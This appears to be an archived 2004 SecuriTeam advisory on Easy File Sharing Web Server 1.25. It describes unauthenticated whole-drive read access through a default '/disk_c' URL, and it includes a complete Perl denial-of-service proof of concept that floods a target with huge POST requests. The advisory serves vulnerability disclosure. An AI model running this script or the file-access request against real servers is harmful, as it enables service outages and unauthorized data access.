Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] Easy File Sharing Web Server File Access and DoS

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] Easy File Sharing Web Server File Access and DoS
Date: 29 Aug 2004 08:43:09 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Easy File Sharing Web Server File Access and DoS
------------------------------------------------------------------------


SUMMARY

 <http://www.sharing-file.com> Easy File Sharing Web Server is  a file 
sharing software that allows visitors to upload/download files easily 
through a Web Browser (IE, Netscape, Opera etc.). It can help you share 
files with your friends and colleagues. They can download files from your 
computer or upload files from theirs. They will not be required to install 
this software or any other software because an Internet browser is enough. 
Easy File Sharing Web Server also provides a Bulletin Board System 
(Forum). It allows remote users to post messages and files to the forum .

The EFS web server allows any file on the file system to be accessed and 
is also vulnerable to denial of service.
 <http://www.sharing-file.com> Easy File Sharing Web Server is  a file 
sharing software that allows visitors to upload/download files easily 
through a Web Browser (IE, Netscape, Opera etc.). It can help you share 
files with your friends and colleagues. They can download files from your 
computer or upload files from theirs. They will not be required to install 
this software or any other software because an Internet browser is enough. 
Easy File Sharing Web Server also provides a Bulletin Board System 
(Forum). It allows remote users to post messages and files to the forum .

The EFS web server allows any file on the file system to be accessed and 
is also vulnerable to denial of service.

DETAILS

Vulnerable Systems:
 * Easy File Sharing webserver version 1.25

Unauthorized System Access
The authorization function used by EFS web server is supposed to keep just 
anyone from being able to access your files. But this is not the case and 
an attacker has read access to the entire hard drive by default:
http://<host>/disk_c

This URL will give an attacker read access to the entire C drive. The 
issue is exploited by requesting the name of a virtual folder on the 
server (disk_c is there by default.)

Denial Of Service
Easy File Sharing Web Server is vulnerable to a DoS attack and may even be 
remotely crashed by sending a number of large HTTP requests to the web 
server. The CPU usage goes up to 99% and in some cases the server crashes.

Exploit:
#!/usr/bin/perl
#####################################################
# Easy File Sharing Webserver v1.25 Denial Of Service
# Proof Of Concept Code By GulfTech Security Research
#####################################################
# Easy File Sharing Webserver v1.25 will consume 99%
# of CPU usage until it crashes when sent large req's
#####################################################

use IO::Socket;

print "=====================================================\n".
       " Easy File Sharing Webserver v1.25 Denial Of Service \n".
       "=====================================================\n";

unless (@ARGV > 1) { die("usage: efswsdos.pl host port"); }

my $remote_host = $ARGV[0];
my $remote_port = $ARGV[1];
my $done = "\015\012\015\012";
my $buff = "A" x 1000000;
my $post = "POST /".$buff." HTTP/1.0 ".$done;

print "[*] DoS'ing Server $remote_host Press ctrl+c to stop\n";

while ($post) {
    for (my $i=1; $i<10; $i++) {
    my $i = IO::Socket::INET->new( Proto => "tcp",
    PeerAddr  => $remote_host,
    PeerPort  => $remote_port,
    Timeout   => '10000',
    Type      => SOCK_STREAM,
    ) || die("[*] Server Is Dead!");

    print $i $post;
    $i->autoflush(1);
   }
}
close $i;


ADDITIONAL INFORMATION

The information has been provided by  <mailto:security@gulftech.org> 
GulfTech Security.
The original article can be found at:  
<http://www.gulftech.org/?node=research&article_id=00045-08242004> 
http://www.gulftech.org/?node=research&article_id=00045-08242004



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] Easy File Sharing Web Server File Access and DoS, SecuriTeam <=
Previous by Date:  [NT] Painkiller DoS and Limited Code Execution, SecuriTeam
Next by Date:  [NT] Keene Digital Media Server Directory Traversal, SecuriTeam
Previous by Thread:  [NT] Painkiller DoS and Limited Code Execution, SecuriTeam
Next by Thread:  [NT] Keene Digital Media Server Directory Traversal, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]